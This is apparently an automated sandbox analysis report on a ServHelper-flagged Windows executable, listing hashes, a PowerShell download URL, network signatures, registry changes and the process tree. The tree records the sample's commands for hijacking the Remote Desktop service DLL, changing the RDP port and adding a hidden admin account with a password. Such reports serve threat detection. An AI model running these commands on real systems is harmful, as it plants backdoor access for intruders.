Analysis
-
max time kernel
121s -
max time network
123s -
submitted
01-01-1970 00:00
Static task
static1
Behavioral task
behavioral1
Sample
cc28e327610e9deb6551c99a32a44fec86220f2840276474ded747580af850d3.exe
Resource
win10-en-20211014
General
-
Target
cc28e327610e9deb6551c99a32a44fec86220f2840276474ded747580af850d3.exe
-
Size
5.7MB
-
MD5
63151e4f7c3972f18a23c0e9996e14ef
-
SHA1
5d041fde6433a8ff8fc78a69fca1fd4630e3f270
-
SHA256
cc28e327610e9deb6551c99a32a44fec86220f2840276474ded747580af850d3
-
SHA512
f08c402f0a966cbe89fae0b5f9aa8536d6313dada788486a4db422a042769713a2896753acd47223348349b9960b5cde9470cc862668e2cdb90a6fcc1b87c8ec
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
suricata: ET MALWARE ServHelper CnC Inital Checkin
suricata: ET MALWARE ServHelper CnC Inital Checkin
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 9 IoCs
Processes:
powershell.exeflow pid process 29 2784 powershell.exe 31 2784 powershell.exe 32 2784 powershell.exe 33 2784 powershell.exe 35 2784 powershell.exe 37 2784 powershell.exe 39 2784 powershell.exe 41 2784 powershell.exe 43 2784 powershell.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule \Windows\Branding\mediasrv.png upx \Windows\Branding\mediasvc.png upx -
Loads dropped DLL 2 IoCs
Processes:
pid process 2984 2984 -
Drops file in Program Files directory 4 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT powershell.exe -
Drops file in Windows directory 19 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_pyxm0lf3.2v4.ps1 powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI1F0.tmp powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_naqtuh4w.yso.psm1 powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI270.tmp powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI24F.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI25F.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI281.tmp powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP powershell.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Icon = "inetcpl.cpl#00004481" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1200 = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\SelfHealCount = "1" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\CurrentLevel = "0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\PMDisplayName = "Restricted sites [Protected Mode]" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\DisplayName = "Internet" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1200 = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1400 = "0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Flags = "71" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Flags = "33" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Description = "Your computer" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\CurrentLevel = "0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\LowIcon = "inetcpl.cpl#005425" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\1200 = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data." powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\PMDisplayName = "Internet [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\IE5_UA_Backup_Flag = "5.0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1200 = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Icon = "inetcpl.cpl#00004481" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\CurrentLevel = "73728" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\16\52C64B7E powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyByPass = "0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\LowIcon = "inetcpl.cpl#005426" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\PMDisplayName = "Restricted sites [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map\ef29a4ec885fa451 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings,User Agent," powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent = "Mozilla/4.0 (compatible; MSIE 8.0; Win32)" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\CurrentLevel = "0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\LowIcon = "inetcpl.cpl#005422" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\CurrentLevel = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Flags = "33" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet." powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\CurrentLevel = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\ef29a4ec885fa451 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c00550073006500720020004100670065006e0074002c000000010054004d006f007a0069006c006c0061002f0035002e0030002000280063006f006d00700061007400690062006c0065003b0020004d00530049004500200039002e0030003b002000570069006e003300320029000000000000000000 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\LowIcon = "inetcpl.cpl#005426" powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 31 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 32 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 33 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 35 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 18 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 4380 powershell.exe 4380 powershell.exe 4380 powershell.exe 540 powershell.exe 540 powershell.exe 540 powershell.exe 2520 powershell.exe 2520 powershell.exe 2520 powershell.exe 4940 powershell.exe 4940 powershell.exe 4940 powershell.exe 4380 powershell.exe 4380 powershell.exe 4380 powershell.exe 2784 powershell.exe 2784 powershell.exe 2784 powershell.exe -
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid process 620 620 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 4380 powershell.exe Token: SeDebugPrivilege 540 powershell.exe Token: SeIncreaseQuotaPrivilege 540 powershell.exe Token: SeSecurityPrivilege 540 powershell.exe Token: SeTakeOwnershipPrivilege 540 powershell.exe Token: SeLoadDriverPrivilege 540 powershell.exe Token: SeSystemProfilePrivilege 540 powershell.exe Token: SeSystemtimePrivilege 540 powershell.exe Token: SeProfSingleProcessPrivilege 540 powershell.exe Token: SeIncBasePriorityPrivilege 540 powershell.exe Token: SeCreatePagefilePrivilege 540 powershell.exe Token: SeBackupPrivilege 540 powershell.exe Token: SeRestorePrivilege 540 powershell.exe Token: SeShutdownPrivilege 540 powershell.exe Token: SeDebugPrivilege 540 powershell.exe Token: SeSystemEnvironmentPrivilege 540 powershell.exe Token: SeRemoteShutdownPrivilege 540 powershell.exe Token: SeUndockPrivilege 540 powershell.exe Token: SeManageVolumePrivilege 540 powershell.exe Token: 33 540 powershell.exe Token: 34 540 powershell.exe Token: 35 540 powershell.exe Token: 36 540 powershell.exe Token: SeDebugPrivilege 2520 powershell.exe Token: SeIncreaseQuotaPrivilege 2520 powershell.exe Token: SeSecurityPrivilege 2520 powershell.exe Token: SeTakeOwnershipPrivilege 2520 powershell.exe Token: SeLoadDriverPrivilege 2520 powershell.exe Token: SeSystemProfilePrivilege 2520 powershell.exe Token: SeSystemtimePrivilege 2520 powershell.exe Token: SeProfSingleProcessPrivilege 2520 powershell.exe Token: SeIncBasePriorityPrivilege 2520 powershell.exe Token: SeCreatePagefilePrivilege 2520 powershell.exe Token: SeBackupPrivilege 2520 powershell.exe Token: SeRestorePrivilege 2520 powershell.exe Token: SeShutdownPrivilege 2520 powershell.exe Token: SeDebugPrivilege 2520 powershell.exe Token: SeSystemEnvironmentPrivilege 2520 powershell.exe Token: SeRemoteShutdownPrivilege 2520 powershell.exe Token: SeUndockPrivilege 2520 powershell.exe Token: SeManageVolumePrivilege 2520 powershell.exe Token: 33 2520 powershell.exe Token: 34 2520 powershell.exe Token: 35 2520 powershell.exe Token: 36 2520 powershell.exe Token: SeDebugPrivilege 4940 powershell.exe Token: SeIncreaseQuotaPrivilege 4940 powershell.exe Token: SeSecurityPrivilege 4940 powershell.exe Token: SeTakeOwnershipPrivilege 4940 powershell.exe Token: SeLoadDriverPrivilege 4940 powershell.exe Token: SeSystemProfilePrivilege 4940 powershell.exe Token: SeSystemtimePrivilege 4940 powershell.exe Token: SeProfSingleProcessPrivilege 4940 powershell.exe Token: SeIncBasePriorityPrivilege 4940 powershell.exe Token: SeCreatePagefilePrivilege 4940 powershell.exe Token: SeBackupPrivilege 4940 powershell.exe Token: SeRestorePrivilege 4940 powershell.exe Token: SeShutdownPrivilege 4940 powershell.exe Token: SeDebugPrivilege 4940 powershell.exe Token: SeSystemEnvironmentPrivilege 4940 powershell.exe Token: SeRemoteShutdownPrivilege 4940 powershell.exe Token: SeUndockPrivilege 4940 powershell.exe Token: SeManageVolumePrivilege 4940 powershell.exe Token: 33 4940 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cc28e327610e9deb6551c99a32a44fec86220f2840276474ded747580af850d3.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exedescription pid process target process PID 2124 wrote to memory of 4380 2124 cc28e327610e9deb6551c99a32a44fec86220f2840276474ded747580af850d3.exe powershell.exe PID 2124 wrote to memory of 4380 2124 cc28e327610e9deb6551c99a32a44fec86220f2840276474ded747580af850d3.exe powershell.exe PID 4380 wrote to memory of 3124 4380 powershell.exe csc.exe PID 4380 wrote to memory of 3124 4380 powershell.exe csc.exe PID 3124 wrote to memory of 3908 3124 csc.exe cvtres.exe PID 3124 wrote to memory of 3908 3124 csc.exe cvtres.exe PID 4380 wrote to memory of 540 4380 powershell.exe powershell.exe PID 4380 wrote to memory of 540 4380 powershell.exe powershell.exe PID 4380 wrote to memory of 2520 4380 powershell.exe powershell.exe PID 4380 wrote to memory of 2520 4380 powershell.exe powershell.exe PID 4380 wrote to memory of 4940 4380 powershell.exe powershell.exe PID 4380 wrote to memory of 4940 4380 powershell.exe powershell.exe PID 4380 wrote to memory of 1068 4380 powershell.exe reg.exe PID 4380 wrote to memory of 1068 4380 powershell.exe reg.exe PID 4380 wrote to memory of 4696 4380 powershell.exe reg.exe PID 4380 wrote to memory of 4696 4380 powershell.exe reg.exe PID 4380 wrote to memory of 4876 4380 powershell.exe reg.exe PID 4380 wrote to memory of 4876 4380 powershell.exe reg.exe PID 4380 wrote to memory of 4528 4380 powershell.exe net.exe PID 4380 wrote to memory of 4528 4380 powershell.exe net.exe PID 4528 wrote to memory of 1916 4528 net.exe net1.exe PID 4528 wrote to memory of 1916 4528 net.exe net1.exe PID 4380 wrote to memory of 2028 4380 powershell.exe cmd.exe PID 4380 wrote to memory of 2028 4380 powershell.exe cmd.exe PID 2028 wrote to memory of 2132 2028 cmd.exe cmd.exe PID 2028 wrote to memory of 2132 2028 cmd.exe cmd.exe PID 2132 wrote to memory of 2636 2132 cmd.exe net.exe PID 2132 wrote to memory of 2636 2132 cmd.exe net.exe PID 2636 wrote to memory of 4524 2636 net.exe net1.exe PID 2636 wrote to memory of 4524 2636 net.exe net1.exe PID 4380 wrote to memory of 2236 4380 powershell.exe cmd.exe PID 4380 wrote to memory of 2236 4380 powershell.exe cmd.exe PID 2236 wrote to memory of 2348 2236 cmd.exe cmd.exe PID 2236 wrote to memory of 2348 2236 cmd.exe cmd.exe PID 2348 wrote to memory of 3212 2348 cmd.exe net.exe PID 2348 wrote to memory of 3212 2348 cmd.exe net.exe PID 3212 wrote to memory of 2624 3212 net.exe net1.exe PID 3212 wrote to memory of 2624 3212 net.exe net1.exe PID 3428 wrote to memory of 4148 3428 cmd.exe net.exe PID 3428 wrote to memory of 4148 3428 cmd.exe net.exe PID 4148 wrote to memory of 3848 4148 net.exe net1.exe PID 4148 wrote to memory of 3848 4148 net.exe net1.exe PID 3820 wrote to memory of 3280 3820 cmd.exe net.exe PID 3820 wrote to memory of 3280 3820 cmd.exe net.exe PID 3280 wrote to memory of 4384 3280 net.exe net1.exe PID 3280 wrote to memory of 4384 3280 net.exe net1.exe PID 4332 wrote to memory of 4436 4332 cmd.exe net.exe PID 4332 wrote to memory of 4436 4332 cmd.exe net.exe PID 4436 wrote to memory of 4544 4436 net.exe net1.exe PID 4436 wrote to memory of 4544 4436 net.exe net1.exe PID 3724 wrote to memory of 3908 3724 cmd.exe net.exe PID 3724 wrote to memory of 3908 3724 cmd.exe net.exe PID 3908 wrote to memory of 3124 3908 net.exe net1.exe PID 3908 wrote to memory of 3124 3908 net.exe net1.exe PID 976 wrote to memory of 2980 976 cmd.exe net.exe PID 976 wrote to memory of 2980 976 cmd.exe net.exe PID 2980 wrote to memory of 508 2980 net.exe net1.exe PID 2980 wrote to memory of 508 2980 net.exe net1.exe PID 1028 wrote to memory of 1392 1028 cmd.exe net.exe PID 1028 wrote to memory of 1392 1028 cmd.exe net.exe PID 1392 wrote to memory of 1508 1392 net.exe net1.exe PID 1392 wrote to memory of 1508 1392 net.exe net1.exe PID 1584 wrote to memory of 1148 1584 cmd.exe WMIC.exe PID 1584 wrote to memory of 1148 1584 cmd.exe WMIC.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\cc28e327610e9deb6551c99a32a44fec86220f2840276474ded747580af850d3.exe"C:\Users\Admin\AppData\Local\Temp\cc28e327610e9deb6551c99a32a44fec86220f2840276474ded747580af850d3.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2124 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4380 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\iwj0osjc\iwj0osjc.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:3124 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBDE2.tmp" "c:\Users\Admin\AppData\Local\Temp\iwj0osjc\CSC8F382BDC945A4C3399FA379EBB929D51.TMP"4⤵PID:3908
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:540
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2520
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4940
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵PID:1068
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
PID:4696
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵PID:4876
-
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
PID:4528 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵PID:1916
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
PID:2028 -
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
PID:2132 -
C:\Windows\system32\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
PID:2636 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵PID:4524
-
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
- Suspicious use of WriteProcessMemory
PID:2236 -
C:\Windows\system32\cmd.execmd /c net start TermService4⤵
- Suspicious use of WriteProcessMemory
PID:2348 -
C:\Windows\system32\net.exenet start TermService5⤵
- Suspicious use of WriteProcessMemory
PID:3212 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵PID:2624
-
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵PID:2920
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵PID:5064
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 000000 /del1⤵
- Suspicious use of WriteProcessMemory
PID:3428 -
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 000000 /del2⤵
- Suspicious use of WriteProcessMemory
PID:4148 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 000000 /del3⤵PID:3848
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc pT2adOrW /add1⤵
- Suspicious use of WriteProcessMemory
PID:3820 -
C:\Windows\system32\net.exenet.exe user WgaUtilAcc pT2adOrW /add2⤵
- Suspicious use of WriteProcessMemory
PID:3280 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc pT2adOrW /add3⤵PID:4384
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD1⤵
- Suspicious use of WriteProcessMemory
PID:4332 -
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:4436 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD3⤵PID:4544
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" JQKTJDNJ$ /ADD1⤵
- Suspicious use of WriteProcessMemory
PID:3724 -
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" JQKTJDNJ$ /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:3908 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" JQKTJDNJ$ /ADD3⤵PID:3124
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD1⤵
- Suspicious use of WriteProcessMemory
PID:976 -
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:2980 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD3⤵PID:508
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc pT2adOrW1⤵
- Suspicious use of WriteProcessMemory
PID:1028 -
C:\Windows\system32\net.exenet.exe user WgaUtilAcc pT2adOrW2⤵
- Suspicious use of WriteProcessMemory
PID:1392 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc pT2adOrW3⤵PID:1508
-
-
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵
- Suspicious use of WriteProcessMemory
PID:1584 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵PID:1148
-
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵PID:424
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵PID:720
-
-
